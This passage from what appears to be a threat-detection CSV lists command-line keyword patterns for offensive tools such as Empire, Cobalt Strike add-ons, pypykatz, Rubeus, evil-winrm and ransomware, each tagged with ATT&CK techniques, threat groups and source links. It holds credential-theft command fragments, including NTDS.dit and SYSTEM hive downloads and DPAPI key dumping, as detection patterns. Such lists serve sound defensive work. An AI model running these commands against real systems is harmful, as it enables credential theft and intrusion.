,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* domainDumper*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,0,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -* domainhunter *,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -* --domains ./domains.txt 
run*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -* domcon-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* domcon-cmd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dome.py*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,0,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -* domino-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -DoNotPersistImmediately *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --dont-enumerate-acls *,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -* --dont-enumerate-acls * -e *,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -* --donut --rehash n --silent -o /tmp/*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* donut.c *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* donut.exe *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* donut.o *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* --dotnetassembly * --amsi*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --appdomain *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --assemblyargs *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --mailslot*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --dotnetassembly * --pipe *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a 
proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* -Downgrade False -Restore False -Impersonate True * -challange *,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,0,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z -* download *\NTDS\NTDS.dit*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -* download *\Windows\System32\config\SYSTEM*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,N/A,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -* dpap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dpapi blob *.json *.dat*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi credential *.json cred*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi masterkey /root/*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi minidump *.dmp*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi prekey nt *S-1-5-21*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - 
TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi prekey password *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi prekey registry *.reg*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi securestring *.dat*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker,1,0,N/A,N/A,1,55,28,2023-06-14T23:25:46Z,2022-03-08T17:13:24Z -* --drag-and-drop*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* DraytekScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* drda-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* drda-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* DriverName *Xeroxxx*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --drop-drag-and-drop-target*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dropping source port zero packet from *,greyware_tool_keyword,dns,Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -* dump * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos 
interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* dump --bucket *--dump-dir*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -* dump_memory64*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,0,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -* 
--dump-adcs*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* -DumpCerts *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -DumpCreds *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 